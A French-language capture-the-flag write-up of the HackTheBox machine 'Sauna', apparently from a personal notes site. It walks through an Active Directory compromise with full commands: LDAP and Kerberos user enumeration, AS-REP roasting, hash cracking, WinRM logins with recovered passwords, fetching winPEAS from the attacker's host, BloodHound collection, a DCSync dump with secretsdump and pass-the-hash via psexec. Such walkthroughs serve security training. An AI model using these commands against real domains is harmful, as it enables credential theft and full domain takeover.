Sauna HackTheBox (Writeup)

Skills:

Information Leakage
Ldap Enumeration
Kerberos User Enumeration - Kerbrute
ASRepRoast Attack (GetNPUsers)
Cracking Hashes
System Enumeration - WinPEAS
AutoLogon Credentials
BloodHound - SharpHound.ps1
DCSync Attack - Secretsdump [Privilege Escalation]
PassTheHash

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.175 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49675,49676,49677,49736,49802 10.10.10.175 -oN targeted

Énumération et Exploitation:

Reconnaissance SMB:

Utilisation de CrackMapExec pour identifier le système d'exploitation

crackmapexec smb 10.10.10.175

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP.

Exploration des partages SMB sur le réseau pour identifier les ressources partagées mais aucun resultat.

crackmapexec smb 10.10.10.175 --shares

smbmap -H 10.10.10.175 -u 'null'

smbclient -L 10.10.10.175 -N

Reconnaissance RPC:

Utilisation de rpcclient pour interagir avec les services RPC et collecter des informations sur les ressources

rpcclient -U "" 10.10.10.175 -N
enumdomusers

Reconnaissance LDAP:

389, 636, 3268, 3269 - Pentesting LDAP - HackTricksbook.hacktricks.xyz

Analyse des informations LDAP pour obtenir des détails sur la structure du domaine et les utilisateurs.

ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts

Analyse des Informations LDAP

Analyse des détails sur la structure du domaine et les utilisateurs.

ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL

Filtrage des Utilisateurs LDAP

Filtrage pour obtenir seulement les utilisateurs LDAP.

ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' | grep "dn: CN=" | sed 's/dn: CN=//;s/,DC=EGOTISTICAL-BANK,DC=LOCAL//'

Énumération des Utilisateurs:

Création d'un fichier `users.txt` contenant des noms d'utilisateurs potentiels.

hugosmith
h.smith 
hugo.smith
hsmith

fergussmith
f.smith 
fergus.smith 
fsmith

hugobear
h.bear
hugo.bear
hbear

stevenkerb
s.kerb
steven.kerb
skerb

shauncoins
s.coins
shaun.coins
scoins

bowietaylor
b.taylor
bowie.taylor
btaylor

sophiedriver
s.driver
sophie.driver
sdriver

Énumération des Utilisateurs via Kerberos

Utilisation de kerbrute pour énumérer les utilisateurs valides.

./kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 users.txt

Énumération des Utilisateurs via Impacket

Utilisation de impacket-GetNPUsers pour énumérer les utilisateurs valides sans mot de passe.

impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users.txt

Attaque par Force Brute:

Utilisation de John pour cracker le hash récupéré.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Connexion et Contrôle à Distance

Utilisation de WinRM pour se connecter à distance.

crackmapexec smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Effectivement, cela fonctionne, mais sans le pwned, il n'est pas possible de se connecter via WinRM.

Dans cet exemple, la connexion est possible parce que l'utilisateur fsmith est membre du groupe *Remote Management Users

crackmapexec winrm 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Connexion avec Evil-WinRM

Utilisation de Evil-WinRM pour une connexion interactive via WinRM.

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Élévation de privilége:

Vérification des Privilèges Spéciaux:

Utilisation de whoami /priv pour vérifier les privilèges spéciaux.

Recherche de Nouveaux Utilisateurs

Utilisation de net user pour rechercher de nouveaux utilisateurs.

Recherche de Credentials pour l'Utilisateur "svc_loanmgr"

Reconnaissance avec winPEAS.exe

Release Release refs/heads/master 20220717 · peass-ng/PEASS-ngGitHub

Téléchargement et exécution de l'outil de reconnaissance winPEAS

Invoke-WebRequest -Uri "http://10.10.14.4:445/winPEASx64.exe" -OutFile "winPEAS.exe"
.\winPEAS.exe

Validation des identifiants trouvés avec crackmapexec :

Les identifiants de connexion automatique pour l'utilisateur svc_loanmgr ont été trouvés, avec le mot de passe

Utilisation de crackmapexec pour valider que le mot de passe est correct.

crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

Connexion avec les identifiants "svc_loanmgr" :

evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

Énumération du Domaine avec Bloodhound :

Installation Bloodhound:

apt install neo4j bloodhound
neo4j console &> /dev/null & disown
lsof -i:7474

Connexion à Bloodhound avec les identifiants neo4j:neo4j.

Lancement de Bloodhound.

bloodhound &> /dev/null & disown

Collecte d'informations avec SharpHound.ps1 :

powershell/SharpHound.ps1 at master · puckiestyle/powershellGitHub

Transfert des données collectées vers Linux et importation dans Bloodhound

Création d'un fichier .zip avec les résultats de la collecte.

Import-Module .\sharhound.ps1
Invoke-BloodHound -CollectionMethod All

Téléchargement du fichier zip depuis la machine Windows vers Linux.

download PS C:\windows\temp\privesc\file.zip file.zip

Importation du fichier zip dans Bloodhound.

Analyse et Exploitation:

Filtrage pour le chemin le plus court vers l'administration

L'outil indique la possibilité d'effectuer une attaque DCsync.

Vulnérabilité DCSync Attack:

DCSync - HackTricksbook.hacktricks.xyz

Utilisation de secretsdump pour obtenir le hash NT de l'utilisateur administrateur.

impacket-secretsdump EGOTISTICAL-BANK.LOCAL/[email protected]

Utilisation de psexec pour exécuter une cmd en tant qu'administrateur en utilisant le hash NT.

impacket-psexec EGOTISTICAL-BANK.LOCAL/[email protected] cmd.exe -hashes :823452073d75b9d1cf70ebdf86c7f98e

Flag finale :)

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagÉnumération et Exploitation:

hashtagReconnaissance SMB:

hashtagExploration des partages SMB sur le réseau pour identifier les ressources partagées mais aucun resultat.

hashtagReconnaissance RPC:

hashtagReconnaissance LDAP:

hashtagAnalyse des informations LDAP pour obtenir des détails sur la structure du domaine et les utilisateurs.

hashtagÉnumération des Utilisateurs:

hashtagCréation d'un fichier users.txt contenant des noms d'utilisateurs potentiels.

hashtagÉnumération des Utilisateurs via Kerberos

hashtagÉnumération des Utilisateurs via Impacket

hashtagAttaque par Force Brute:

hashtagConnexion et Contrôle à Distance

hashtagEffectivement, cela fonctionne, mais sans le pwned, il n'est pas possible de se connecter via WinRM.

hashtagConnexion avec Evil-WinRM

hashtagÉlévation de privilége:

hashtagVérification des Privilèges Spéciaux:

hashtagRecherche de Nouveaux Utilisateurs

hashtagReconnaissance avec winPEAS.exe

hashtagValidation des identifiants trouvés avec crackmapexec :

hashtagUtilisation de crackmapexec pour valider que le mot de passe est correct.

hashtagConnexion avec les identifiants "svc_loanmgr" :

hashtagÉnumération du Domaine avec Bloodhound :

hashtagConnexion à Bloodhound avec les identifiants neo4j:neo4j.

hashtagLancement de Bloodhound.

hashtagCollecte d'informations avec SharpHound.ps1 :

hashtagTransfert des données collectées vers Linux et importation dans Bloodhound

hashtagCréation d'un fichier .zip avec les résultats de la collecte.

hashtagTéléchargement du fichier zip depuis la machine Windows vers Linux.

hashtagImportation du fichier zip dans Bloodhound.

hashtagAnalyse et Exploitation:

hashtagFiltrage pour le chemin le plus court vers l'administration

hashtagL'outil indique la possibilité d'effectuer une attaque DCsync.

hashtagVulnérabilité DCSync Attack:

hashtagUtilisation de secretsdump pour obtenir le hash NT de l'utilisateur administrateur.

hashtagUtilisation de psexec pour exécuter une cmd en tant qu'administrateur en utilisant le hash NT.

hashtagFlag finale :)